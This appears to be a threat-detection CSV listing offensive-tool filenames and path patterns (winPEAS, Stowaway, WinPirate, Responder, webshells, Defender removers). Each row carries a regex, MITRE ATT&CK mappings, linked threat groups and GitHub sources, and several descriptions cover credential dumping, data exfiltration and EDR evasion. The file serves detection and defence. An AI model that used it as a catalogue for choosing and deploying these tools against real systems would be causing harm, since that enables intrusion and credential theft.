"*\Windows\temp\payload.exe*",".{0,1000}\\Windows\\temp\\payload\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","19751"
"*\windows\temp\pwned.trx*",".{0,1000}\\windows\\temp\\pwned\.trx.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","19752"
"*\Windows\Temp\Results.txt*",".{0,1000}\\Windows\\Temp\\Results\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","19753"
"*\windows\temp\sam.tmp*",".{0,1000}\\windows\\temp\\sam\.tmp.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","N/A","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","19755"
"*\windows\temp\sam.tmp*",".{0,1000}\\windows\\temp\\sam\.tmp.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","19756"
"*\windows\temp\sec.tmp*",".{0,1000}\\windows\\temp\\sec\.tmp.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","N/A","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","19759"
"*\windows\temp\sec.tmp*",".{0,1000}\\windows\\temp\\sec\.tmp.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","19760"
"*\windows\temp\sys.tmp*",".{0,1000}\\windows\\temp\\sys\.tmp.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","N/A","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","19761"
"*\windows\temp\sys.tmp*",".{0,1000}\\windows\\temp\\sys\.tmp.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","19762"
"*\Windows\Temp\temp.ps1*",".{0,1000}\\Windows\\Temp\\temp\.ps1.{0,1000}","offensive_tool_keyword","crackmapexec","CrackMapExec behavior","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0001 - TA0002 - TA0007 - TA0008","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Lateral Movement","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","19764"
"*\Windows\Ui\index.html*",".{0,1000}\\Windows\\Ui\\index\.html.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","19765"
"*\windows_downdate.py*",".{0,1000}\\windows_downdate\.py.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","0","N/A","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","19766"
"*\windows_x64_admin.exe*",".{0,1000}\\windows_x64_admin\.exe.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","19767"
"*\windows_x64_agent.exe*",".{0,1000}\\windows_x64_agent\.exe.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","19768"
"*\windows_x86_admin.exe*",".{0,1000}\\windows_x86_admin\.exe.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","19769"
"*\windows_x86_agent.exe*",".{0,1000}\\windows_x86_agent\.exe.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","19770"
"*\windows-defender-remover\*",".{0,1000}\\windows\-defender\-remover\\.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","19772"
"*\windows-defender-remover-main*",".{0,1000}\\windows\-defender\-remover\-main.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","19773"
"*\WindowsDowndate-main*",".{0,1000}\\WindowsDowndate\-main.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","0","N/A","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","19774"
"*\Windows-Passwords.ps1*",".{0,1000}\\Windows\-Passwords\.ps1.{0,1000}","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","19775"
"*\WindowsShareFinder.cs*",".{0,1000}\\WindowsShareFinder\.cs.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","N/A","9","8","712","80","2025-01-21T22:34:00Z","2021-05-31T19:46:57Z","19776"
"*\winexesvc.exe*",".{0,1000}\\winexesvc\.exe.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","0","#servicename","N/A","8","8","N/A","N/A","N/A","N/A","19777"
"*\WINHELLO2hashcat.py*",".{0,1000}\\WINHELLO2hashcat\.py.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","#linux #windows","N/A","10","1","75","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z","19778"
"*\win-key-killer.ps1*",".{0,1000}\\win\-key\-killer\.ps1.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","19779"
"*\Winner Rat.exe*",".{0,1000}\\Winner\sRat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19780"
"*\winPEAS.exe*",".{0,1000}\\winPEAS\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","19781"
"*\winPEAS.exe*",".{0,1000}\\winPEAS\.exe.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","19782"
"*\winPEAS.exe*",".{0,1000}\\winPEAS\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","winPEAS","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","19783"
"*\winPEAS.exe*",".{0,1000}\\winPEAS\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","19784"
"*\winPEAS.exe*",".{0,1000}\\winPEAS\.exe.{0,1000}","offensive_tool_keyword","winPEAS","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","winPEAS","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","19785"
"*\winPEAS.ps1*",".{0,1000}\\winPEAS\.ps1.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","19786"
"*\winPEAS.sln*",".{0,1000}\\winPEAS\.sln.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","19787"
"*\winPEASany.exe*",".{0,1000}\\winPEASany\.exe.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","19788"
"*\winPEASany.exe*",".{0,1000}\\winPEASany\.exe.{0,1000}","offensive_tool_keyword","winPEAS","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","winPEAS","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","19789"
"*\winPEASany_ofs.exe*",".{0,1000}\\winPEASany_ofs\.exe.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","19790"
"*\winPEASany_ofs.exe*",".{0,1000}\\winPEASany_ofs\.exe.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","19791"
"*\winPEASexe\*",".{0,1000}\\winPEASexe\\.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","19792"
"*\winPEAS-Obfuscated.exe*",".{0,1000}\\winPEAS\-Obfuscated\.exe.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","19793"
"*\winPEASx64.exe*",".{0,1000}\\winPEASx64\.exe.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","19794"
"*\winPEASx86.exe*",".{0,1000}\\winPEASx86\.exe.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","19795"
"*\WinPirate.bat*",".{0,1000}\\WinPirate\.bat.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","19796"
"*\WinPirate\Tools\*",".{0,1000}\\WinPirate\\Tools\\.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","19797"
"*\WinPirate-master*",".{0,1000}\\WinPirate\-master.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","19798"
"*\Win-PS2EXE*",".{0,1000}\\Win\-PS2EXE.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/MScholtes/PS2EXE","1","0","N/A","N/A","N/A","10","1395","217","2025-01-05T11:26:50Z","2019-11-08T09:25:02Z","19799"
"*\winpwnage.py*",".{0,1000}\\winpwnage\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19801"
"*\winscp_dump.py*",".{0,1000}\\winscp_dump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","19803"
"*\WinSCP-sessions.txt*",".{0,1000}\\WinSCP\-sessions\.txt.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","19804"
"*\winsos.cpp*",".{0,1000}\\winsos\.cpp.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","0","N/A","N/A","10","2","111","26","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z","19805"
"*\winsos.exe*",".{0,1000}\\winsos\.exe.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","0","N/A","N/A","10","2","111","26","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z","19806"
"*\WinX Shell.php*",".{0,1000}\\WinX\sShell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","19811"
"*\WiperPoc.cpp*",".{0,1000}\\WiperPoc\.cpp.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","19812"
"*\wireless.py*",".{0,1000}\\wireless\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","19818"
"*\wl_log.txt*",".{0,1000}\\wl_log\.txt.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","N/A","6","2","101","25","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z","19828"
"*\wlanpass.txt*",".{0,1000}\\wlanpass\.txt.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","0","N/A","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","19829"
"*\wl-lic.exe*",".{0,1000}\\wl\-lic\.exe.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","N/A","6","2","101","25","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z","19830"
"*\wl-lic.pdb*",".{0,1000}\\wl\-lic\.pdb.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","N/A","6","2","101","25","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z","19831"
"*\wmeye.csproj*",".{0,1000}\\wmeye\.csproj.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1047 - T1053.005 - T1124 - T1203 - T1569.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/pwn1sher/WMEye","1","0","N/A","N/A","8","4","365","59","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z","19832"
"*\wmeye.pdb*",".{0,1000}\\wmeye\.pdb.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1047 - T1053.005 - T1124 - T1203 - T1569.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/pwn1sher/WMEye","1","0","N/A","N/A","8","4","365","59","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z","19833"
"*\wmi_1.dll*",".{0,1000}\\wmi_1\.dll.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","N/A","10","1781","301","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z","19834"
"*\wmi_2.dll*",".{0,1000}\\wmi_2\.dll.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","N/A","10","1781","301","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z","19835"
"*\wmi_exec.exe*",".{0,1000}\\wmi_exec\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","19836"
